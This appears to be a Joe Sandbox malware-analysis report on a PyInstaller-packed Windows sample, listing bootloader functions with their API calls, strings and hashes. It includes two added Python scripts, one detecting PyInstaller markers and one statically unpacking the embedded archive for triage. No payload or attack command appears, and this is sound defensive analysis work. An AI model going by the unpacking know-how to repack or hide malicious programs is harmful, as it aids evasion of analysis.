• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
• API String ID: 2776309574-3273434969
• Opcode ID: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
• Instruction ID: cafc582e4898b173757be918cddb94462a8f1988d49ae1e67d160993d5bff82a
• Opcode Fuzzy Hash: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
• Instruction Fuzzy Hash: 0A329F23A2C68391FA69BB24D4543B96761AFC4784FA440B6DA4DC32F6EF2CE554E700
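The two graphs above (the hidden-window launcher at 0x7ff67aed8bd0 and the bootloader main at 0x7ff67aed1000) are identified as PyInstaller onefile code only through their string references. The following is an added triage example, not part of the Joe Sandbox report or of PyInstaller: it scans a byte buffer (a dropped PE or a memory dump) for the marker strings this report lists, in both ASCII and UTF-16LE since the Windows bootloader uses wide strings for its window class, and additionally for the PyInstaller archive cookie magic, which is a known PyInstaller constant not shown on this page. The weighting and verdict threshold are this example's own assumption, and the sample buffers are constructed, not real file contents.

```python
"""PyInstaller onefile bootloader triage by marker strings (added example)."""
from __future__ import annotations

# Strings the report lists for the bootloader functions (String IDs above):
# hidden-window class names, parent/child handshake env vars, archive handling.
BOOTLOADER_MARKERS = (
    "PyInstaller Onefile Hidden Window",
    "PyInstallerOnefileHiddenWindow",
    "_PYI_ARCHIVE_FILE",
    "_PYI_APPLICATION_HOME_DIR",
    "_PYI_PARENT_PROCESS_LEVEL",
    "_PYI_SPLASH_IPC",
    "PYINSTALLER_RESET_ENVIRONMENT",
    "PYINSTALLER_STRICT_UNPACK_MODE",
    "pyi-contents-directory",
    "Failed to create child process!",
)

# Magic of the embedded CArchive cookie (PyInstaller's archive MAGIC).
# Not shown in the report; stated here as a known PyInstaller constant.
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"


def find_markers(data: bytes) -> dict[str, list[str]]:
    """Return {marker: [encodings it was found in]} for every marker present.

    Both encodings are checked because the bootloader's RegisterClassW class
    name is stored as UTF-16LE while other strings may be narrow."""
    hits: dict[str, list[str]] = {}
    for marker in BOOTLOADER_MARKERS:
        found = []
        if marker.encode("ascii") in data:
            found.append("ascii")
        if marker.encode("utf-16-le") in data:
            found.append("utf-16le")
        if found:
            hits[marker] = found
    return hits


def has_archive_magic(data: bytes) -> bool:
    """True if the PyInstaller archive cookie magic appears anywhere in data."""
    return PYINSTALLER_MAGIC in data


def classify(data: bytes) -> str:
    """Assumed threshold: archive magic or two or more distinct markers is a
    confident hit, a single marker is only a suspect, otherwise no indicators."""
    n = len(find_markers(data))
    if has_archive_magic(data) or n >= 2:
        return "pyinstaller-onefile-bootloader"
    if n == 1:
        return "suspect"
    return "no-pyinstaller-indicators"


# Constructed sample buffers (not real file contents): a fake bootloader image
# with one wide marker, two narrow markers and the archive magic, and a benign
# PE-looking stub with none of them.
SAMPLE_BOOTLOADER = (
    b"MZ\x90\x00" + b"\x00" * 32
    + "PyInstaller Onefile Hidden Window".encode("utf-16-le")
    + b"\x00" * 8
    + b"_PYI_ARCHIVE_FILE\x00PYINSTALLER_RESET_ENVIRONMENT\x00"
    + PYINSTALLER_MAGIC + b"\x00" * 16
)
SAMPLE_BENIGN = b"MZ\x90\x00" + b"This program cannot be run in DOS mode." + b"\x00" * 64

if __name__ == "__main__":
    for name, buf in (("bootloader", SAMPLE_BOOTLOADER), ("benign", SAMPLE_BENIGN)):
        print(name, classify(buf), find_markers(buf))
```

Run it against the extracted dump files (read the .sdmp as bytes and pass it to `classify`) to confirm the same classification the report reaches from the String IDs; a hit on the marker strings alone, without the archive magic, usually means the buffer is an unpacked image region rather than the full file.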

Control-flow Graph: function at 0x7ff67aef69d4 (the rendered graph's Executed / Not Executed node colouring and edge list are not reproduced)

Win32 APIs visible in the graph: CreateFileW at three call sites (the initial open, a second attempt on a failure path, and a re-open after CloseHandle), GetFileType with CloseHandle and an error path when the type check fails, GetLastError before each of the internal error-translation calls (7ff67aee4eec), plus internal helpers 7ff67aef6708, 7ff67aee8590, 7ff67aee4f58, 7ff67aee4f78, 7ff67aee84a8, 7ff67aef6910, 7ff67aef6488, 7ff67aeeab30 and 7ff67aee86d0. The open / type-check / close-on-failure shape is consistent with the C runtime's low-level file-open routine in the same image rather than sample-specific logic.
APIs
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction ID: 9775d139d67edc4f97f44dc2b06c4b49005f967b52a26ff5bcff6be1e530c7ca
• Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction Fuzzy Hash: 89C1D037B38A8286EB50EFA4D4902AC3761FB49B98B015279DE6E973E4CF38D411D700

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED841B
• RemoveDirectoryW.KERNEL32(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED849E
• DeleteFileW.KERNELBASE(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED84BD
• FindNextFileW.KERNELBASE(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED84CB
• FindClose.KERNEL32(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED84DC
• RemoveDirectoryW.KERNELBASE(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED84E5
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
• Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
• Instruction ID: d3a2438e11d2ca88eb340adb5ca6ecbc3b6e3c88ee57efbd3099f17788b74922
• Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
• Instruction Fuzzy Hash: 9241B233A2CA4285EE60BB20E4541B96760FBD4B95FA002B6D59DC36E4DF3CE54ADB00
APIs
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction ID: d28ffa42b0d84b46a6519afa3a2c2f60d18f75212e6962a0310a220fa363a27b
• Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction Fuzzy Hash: 4EF06863A3874186FBA09F60B8497667350EBC8764F140775EAAD42BE4DF3CD049DA00
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: CurrentFeaturePresentProcessProcessor
• String ID:
• API String ID: 1010374628-0
• Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
• Instruction ID: 8d9acf8f07449fd11f2eae8f49686f131d102f6b57a441ca05788a938152af3f
• Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
• Instruction Fuzzy Hash: 30029223B3E64681FA95BB15B8012792790EF45BA0F8585B9DD5DC73F1FE3DA801A700

Control-flow Graph

APIs
• Part of subcall function 00007FF67AED7F80: _fread_nolock.LIBCMT ref: 00007FF67AED802A
• _fread_nolock.LIBCMT ref: 00007FF67AED1A1B
• Part of subcall function 00007FF67AED2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF67AED1B6A), ref: 00007FF67AED295E
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
• Instruction ID: b2a02993556ecdc16b705cf08276494c7cbd6882b58917f26097cdbe1aa66f93
• Opcode Fuzzy Hash: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
• Instruction Fuzzy Hash: 50819573A2CA8685E764FB24E0402FD23A1EF84784F5444B5E98DC77A5DE3CE585EB40

Control-flow Graph (basic blocks 7ff67aed1600-7ff67aed183b)

Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
• Opcode ID: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
• Instruction ID: b82633df46db8a370f212e31aa0b0f4ae4a1dbc6fea42a64e576e19e8bbe3e97
• Opcode Fuzzy Hash: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
• Instruction Fuzzy Hash: 2E519D63F2864382EA10BB21A4001B963A0FF84B94F6445B5EE5C877F6EF3CE545E740

Control-flow Graph

APIs
• GetTempPathW.KERNEL32(?,?,00000000,00007FF67AED3CBB), ref: 00007FF67AED88F4
• GetCurrentProcessId.KERNEL32(?,00000000,00007FF67AED3CBB), ref: 00007FF67AED88FA
• CreateDirectoryW.KERNELBASE(?,00000000,00007FF67AED3CBB), ref: 00007FF67AED893C
  • Part of subcall function 00007FF67AED8A20: GetEnvironmentVariableW.KERNEL32(00007FF67AED388E), ref: 00007FF67AED8A57
  • Part of subcall function 00007FF67AED8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF67AED8A79
  • Part of subcall function 00007FF67AEE82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEE82C1
  • Part of subcall function 00007FF67AED2810: MessageBoxW.USER32 ref: 00007FF67AED28EA
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
• API String ID: 3563477958-1339014028
• Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
• Instruction ID: 3f1f4f8e84d84a6d251df56c8224f56326eb2d7cfc222d389400b8b8eef994a6
• Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
• Instruction Fuzzy Hash: 1141BE23A3D68244FA60BB25A8512BA2390AFC8B84F9441B1ED4DD77F6DE3CE501F700

Control-flow Graph (basic blocks 7ff67aed1210-7ff67aed146d)

Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
• Instruction ID: 1ec7006b102bf207a0378e5772f1d5a93109ec49e5ea2f35d8cc00beffea3e4f
• Opcode Fuzzy Hash: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
• Instruction Fuzzy Hash: 7651D023A2C68285EA60BB22A4003BE6691FF85B94FA44175ED4DC77E5EF3CE541E700
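The strings in the four functions above (the `MEI` cookie and TOC reads, the per-entry "Failed to extract %s" messages, the `_MEI%d` directory created under `TMP`, and zlib `1.3.1` with `inflateInit()`) are those of the PyInstaller onefile bootloader unpacking the CArchive appended to its own executable. The parser below is an added illustration, not code from the Joe Sandbox report, the sample, or PyInstaller: it does statically what those functions do at run time (find the cookie from the end of the file, walk the TOC, inflate each entry). The cookie and TOC layouts are PyInstaller's documented struct formats; telling a 2.1 cookie from a 2.0 one by the `python` substring in its last field is a heuristic, and `build_sample_archive` is a constructed fixture used only so the script runs offline.

```python
import struct
import zlib

# Magic of the PyInstaller CArchive cookie. The bootloader searches backwards from
# the end of its own image for this "MEI" marker ("Failed to read cookie!" otherwise).
MAGIC = b"MEI\014\013\012\013\016"

# Cookie layouts, big-endian. PyInstaller 2.1 appended the Python DLL name, growing
# the cookie from 24 to 88 bytes; the leading fields are identical in both.
COOKIE_FMT_V21 = "!8sIIii64s"  # magic, pkg_len, toc_off, toc_len, pyver, pylib_name
COOKIE_FMT_V20 = "!8siiii"
TOC_ENTRY_FMT = "!iIIIBc"      # entry_len, data_pos, compressed_len, raw_len, zlib_flag, type_code
TOC_HDR_LEN = struct.calcsize(TOC_ENTRY_FMT)  # 18 bytes, then a NUL-padded name

TYPE_CODES = {b"b": "binary", b"d": "dependency", b"z": "pyz-archive", b"Z": "zipfile",
              b"M": "package", b"m": "module", b"s": "script", b"x": "data",
              b"o": "runtime-option", b"l": "splash"}


def parse_cookie(blob):
    """Find the MEI cookie and return (archive_start, toc_off, toc_len, pyver)."""
    cookie_off = blob.rfind(MAGIC)
    if cookie_off < 0:
        raise ValueError("no MEI cookie: not a PyInstaller onefile archive")
    v21 = blob[cookie_off:cookie_off + struct.calcsize(COOKIE_FMT_V21)]
    # Heuristic (assumption): a v2.1 cookie names the Python DLL in its 64-byte tail field.
    if len(v21) == struct.calcsize(COOKIE_FMT_V21) and b"python" in v21[24:].lower():
        _, pkg_len, toc_off, toc_len, pyver, _lib = struct.unpack(COOKIE_FMT_V21, v21)
        cookie_len = len(v21)
    else:
        v20 = blob[cookie_off:cookie_off + struct.calcsize(COOKIE_FMT_V20)]
        if len(v20) != struct.calcsize(COOKIE_FMT_V20):
            raise ValueError("truncated cookie")
        _, pkg_len, toc_off, toc_len, pyver = struct.unpack(COOKIE_FMT_V20, v20)
        cookie_len = len(v20)
    # pkg_len counts the archive up to and including the cookie, so the archive begins
    # that many bytes before the cookie's end. Bytes after the cookie (e.g. an appended
    # Authenticode signature) are simply skipped, which is why rfind() is used above.
    archive_start = cookie_off + cookie_len - pkg_len
    if archive_start < 0 or toc_off + toc_len > pkg_len:
        raise ValueError("cookie describes an archive larger than the file")
    return archive_start, toc_off, toc_len, pyver


def parse_toc(blob, archive_start, toc_off, toc_len):
    """Walk the TOC as the loader does: fixed header, then the entry's NUL-padded name."""
    pos, end, entries = archive_start + toc_off, archive_start + toc_off + toc_len, []
    while pos < end:
        hdr = blob[pos:pos + TOC_HDR_LEN]
        if len(hdr) != TOC_HDR_LEN:
            raise ValueError("could not read full TOC")
        entry_len, data_pos, clen, rlen, flag, tcode = struct.unpack(TOC_ENTRY_FMT, hdr)
        if entry_len <= TOC_HDR_LEN or pos + entry_len > end:
            raise ValueError("corrupt TOC entry at offset %#x" % pos)
        name = blob[pos + TOC_HDR_LEN:pos + entry_len].rstrip(b"\0").decode("utf-8", "replace")
        entries.append({"name": name, "pos": archive_start + data_pos, "clen": clen, "rlen": rlen,
                        "compressed": bool(flag),
                        "type": TYPE_CODES.get(tcode, tcode.decode("latin-1"))})
        pos += entry_len
    return entries


def extract_entry(blob, entry):
    """Return one entry's bytes, inflating with zlib when its flag is set."""
    data = blob[entry["pos"]:entry["pos"] + entry["clen"]]
    if len(data) != entry["clen"]:
        raise ValueError("failed to read data chunk for %s" % entry["name"])
    if entry["compressed"]:
        data = zlib.decompress(data)
    if len(data) != entry["rlen"]:
        raise ValueError("size mismatch after inflate for %s" % entry["name"])
    return data


def list_archive(blob):
    """Triage helper: (name, type, uncompressed size) for every TOC entry."""
    start, toc_off, toc_len, _ = parse_cookie(blob)
    return [(e["name"], e["type"], e["rlen"]) for e in parse_toc(blob, start, toc_off, toc_len)]


def build_sample_archive(files, pyver=311, pylib=b"python311.dll"):
    """Constructed fixture, not PyInstaller's writer: pack (name, type_code, payload)
    tuples into a minimal v2.1 CArchive with every entry zlib-compressed."""
    body, toc = bytearray(), bytearray()
    for name, tcode, payload in files:
        comp = zlib.compress(payload)
        name_b = name.encode() + b"\0"
        name_b += b"\0" * (-(TOC_HDR_LEN + len(name_b)) % 16)  # pad each entry to 16 bytes
        toc += struct.pack(TOC_ENTRY_FMT, TOC_HDR_LEN + len(name_b), len(body),
                           len(comp), len(payload), 1, tcode) + name_b
        body += comp
    pkg_len = len(body) + len(toc) + struct.calcsize(COOKIE_FMT_V21)
    cookie = struct.pack(COOKIE_FMT_V21, MAGIC, pkg_len, len(body), len(toc), pyver,
                         pylib.ljust(64, b"\0"))
    return bytes(body + toc + cookie)


if __name__ == "__main__":
    # Constructed stand-in for a packed executable: fake PE prefix, archive, then trailing
    # bytes standing in for an appended signature that the cookie search must skip.
    sample = b"MZ" + b"\x90" * 100 + build_sample_archive(
        [("runner", b"s", b"import os\n"), ("PYZ-00.pyz", b"z", b"PYZ\0" * 40)]) + b"\0" * 33
    for name, kind, size in list_archive(sample):
        print("%-12s %-14s %6d bytes" % (name, kind, size))
```

Listing the TOC this way tells an analyst which script entries and which PYZ to pull next instead of running the sample. At run time the same content is written to the `_MEI<pid>` directory that the `GetTempPathW`/`CreateDirectoryW` function above creates under `TMP`, so that path is worth collecting during incident response.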

Control-flow Graph

APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF67AEEF11A,?,?,-00000018,00007FF67AEEADC3,?,?,?,00007FF67AEEACBA,?,?,?,00007FF67AEE5FAE), ref: 00007FF67AEEEEFC
• GetProcAddress.KERNEL32(?,?,?,00007FF67AEEF11A,?,?,-00000018,00007FF67AEEADC3,?,?,?,00007FF67AEEACBA,?,?,?,00007FF67AEE5FAE), ref: 00007FF67AEEEF08
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
• Instruction ID: 2807465dd65e7a314ca9ac35069b3c1c51167159796584078a8cc42211474b4f
• Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
• Instruction Fuzzy Hash: 9C41E063B3DA02D1FA15EB16A8146753395BF48B90F884579ED1EC73B4EE3CE805A344

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF67AED3804), ref: 00007FF67AED36E1
• GetLastError.KERNEL32(?,00007FF67AED3804), ref: 00007FF67AED36EB
  • Part of subcall function 00007FF67AED2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF67AED3706,?,00007FF67AED3804), ref: 00007FF67AED2C9E
  • Part of subcall function 00007FF67AED2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF67AED3706,?,00007FF67AED3804), ref: 00007FF67AED2D63
  • Part of subcall function 00007FF67AED2C50: MessageBoxW.USER32 ref: 00007FF67AED2D99
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction ID: 1068035de5f70f2578dc069b75941140bd83d80a52dbb56b8f66637b006debcc
• Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction Fuzzy Hash: 98216563B3CA4381FA65BB24E8513B62250BFC8394FA041B6E55DC25F5EF2CE505E740

Control-flow Graph (function at 7ff67aeebacc, basic blocks 7ff67aeebacc-7ff67aeebf18; graph image not reproduced. API calls in the graph: GetConsoleMode at 7ff67aeebd21, ReadConsoleW at 7ff67aeebd3f, GetLastError at 7ff67aeebd63 and 7ff67aeebead, ReadFile at 7ff67aeebd93.)
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
